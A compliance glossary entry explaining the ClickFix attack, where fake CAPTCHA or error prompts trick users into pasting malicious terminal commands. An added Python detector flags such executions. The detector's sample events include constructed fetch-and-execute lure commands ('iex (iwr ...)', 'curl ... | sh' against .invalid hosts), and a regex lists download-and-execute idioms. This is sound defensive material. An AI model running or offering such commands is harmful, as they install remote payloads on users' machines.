Cointegrity

ClickFix

Web3 / compliance

ClickFix is a social engineering technique that saw mass adoption by threat groups including BlueNoroff, Akira, and REDBIKE in late 2025 and 2026. Rather than delivering malware through email attachments — a vector that modern endpoint detection readily flags — ClickFix attackers compromise legitimate websites or send carefully crafted phishing links that present the target with a convincing fake error message: a simulated CAPTCHA failure, a browser-update prompt, or a document rendering error. The prompt instructs the user to open their terminal or Run dialog and paste a specific command to 'fix' the issue. The pasted command executes a malicious script that installs malware, often a remote-access trojan or credential-harvesting implant. Because the user is the one executing the command in a legitimate system context, traditional endpoint security tools do not generate an alert — the execution chain looks identical to an administrator running a routine shell command. ClickFix effectively inverts the traditional social engineering model: rather than tricking the victim into opening a file, it tricks them into becoming the malware delivery mechanism themselves.

Example: A developer at a Web3 firm visited a compromised DeFi documentation site and encountered a fake 'CAPTCHA verification required' prompt. Copying and running the provided terminal command installed a Remote Access Tool that harvested the developer's SSH keys and cloud credentials overnight — providing BlueNoroff operators lateral access to the firm's CI/CD pipeline by morning.

Why it matters for compliance: ClickFix exploits users' willingness to follow simple technical instructions rather than any weakness in software. It bypasses endpoint detection, email filters, and sandbox analysis simultaneously. Crypto and Web3 firms must implement explicit policies prohibiting execution of terminal commands received from any external source, combined with technical controls that alert on unexpected shell-history activity from non-engineering workstations.
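One way to implement the "alert on unexpected shell activity from non-engineering workstations" control the entry calls for, as an added example that is not part of the Cointegrity glossary entry: a small Python detector run over constructed process-creation events. It scores each event on three signals that together characterise a pasted ClickFix command (a script interpreter launched from the Run dialog or a terminal, a download-and-execute idiom in the command line, and a host whose role does not normally involve shell use) and alerts when at least two fire. The host-to-role table, the tab-separated event format, the launcher and interpreter lists, the idiom regex and the threshold are all assumptions for illustration, not a rule from any vendor product.

```python
"""Added example: flag ClickFix-style executions in process-creation telemetry.

Every heuristic below is an assumption of this example, not a published rule:
  1. A shell/script interpreter was launched from a user-facing launcher
     (Run dialog via explorer.exe, a terminal app) rather than a build tool.
  2. The command line contains a "fetch remote content and execute it" idiom.
  3. The host belongs to a role that does not normally run terminal commands.
"""
import re
from dataclasses import dataclass

# Constructed inventory: workstation -> business role. In production this would
# come from the asset inventory or IdP; these hostnames are hypothetical.
HOST_ROLES = {
    "WS-FIN-014": "finance",
    "WS-ENG-221": "engineering",
    "WS-ENG-305": "engineering",
    "MBP-MKT-07": "marketing",
}

# Interpreters a pasted command typically lands in, and the launchers a human
# uses to paste it (the Run dialog is hosted by explorer.exe on Windows).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "bash", "sh", "zsh", "osascript"}
LAUNCHERS = {"explorer.exe", "WindowsTerminal.exe", "Terminal", "iTerm2"}

# Download-and-execute idioms (the *shape* of a lure command, not a payload).
FETCH_EXEC = re.compile(
    r"\b(curl|wget|iwr|iex|Invoke-WebRequest|Invoke-Expression|"
    r"DownloadString|FromBase64String)\b|-EncodedCommand\b|-enc\b|\|\s*(ba)?sh\b",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    host: str
    user: str
    parent: str   # parent process image path
    image: str    # process image path
    cmdline: str  # full command line


def basename(path):
    """Last path component, for either Windows or POSIX separators."""
    return re.split(r"[\\/]", path)[-1]


def parse_line(line):
    """Parse one constructed event: host<TAB>user<TAB>parent<TAB>image<TAB>cmdline."""
    host, user, parent, image, cmdline = line.split("\t", 4)
    return ProcEvent(host, user, parent, image, cmdline)


def score(ev):
    """Return (score, reasons). Signals only count when an interpreter ran."""
    reasons = []
    if basename(ev.image) in INTERPRETERS:
        if basename(ev.parent) in LAUNCHERS:
            reasons.append("interpreter launched from Run dialog/terminal")
        if FETCH_EXEC.search(ev.cmdline):
            reasons.append("download-and-execute idiom in command line")
        role = HOST_ROLES.get(ev.host, "unknown")
        if role != "engineering":
            reasons.append(f"shell use on non-engineering host (role: {role})")
    return len(reasons), reasons


def detect(lines, threshold=2):
    """Return (host, user, reasons) for every event scoring at or above threshold."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        s, reasons = score(ev)
        if s >= threshold:
            alerts.append((ev.host, ev.user, reasons))
    return alerts


# Constructed sample telemetry; domains use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    # Finance user pastes a lure into the Run dialog -> should alert.
    "WS-FIN-014\tj.doe\tC:\\Windows\\explorer.exe\t"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    'powershell.exe -w hidden -c "iex (iwr https://captcha-check.example.invalid/fix.txt)"',
    # Engineer opens a terminal normally -> one weak signal only.
    "WS-ENG-221\tdev1\tC:\\Program Files\\WindowsApps\\WindowsTerminal.exe\t"
    "C:\\Program Files\\PowerShell\\7\\pwsh.exe\tpwsh.exe -NoLogo",
    # Marketing laptop runs a pasted curl|sh from Terminal -> should alert.
    "MBP-MKT-07\tmkt.lead\t/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\t"
    '/bin/bash\tbash -c "curl -fsSL https://update.example.invalid/fix.sh | sh"',
    # Engineering build script fetching a dependency installer -> idiom alone, no alert.
    "WS-ENG-305\tdev2\t/usr/bin/bash\t/bin/sh\t"
    'sh -c "curl -fsSL https://deps.example.invalid/install.sh | sh"',
    # Non-interpreter child of explorer.exe -> ignored.
    "WS-FIN-014\tj.doe\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\notepad.exe\tnotepad.exe report.txt",
]

if __name__ == "__main__":
    for host, user, reasons in detect(SAMPLE_EVENTS):
        print(f"ALERT {host} ({user}): " + "; ".join(reasons))
```

The threshold matters: requiring two signals keeps an engineer's ordinary terminal session and a build script's `curl | sh` below the alert line, while a pasted command from a finance or marketing workstation trips all three. In practice the role table and launcher list would be fed from inventory and EDR parent-process fields rather than hard-coded.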

Category: compliance, wallet security
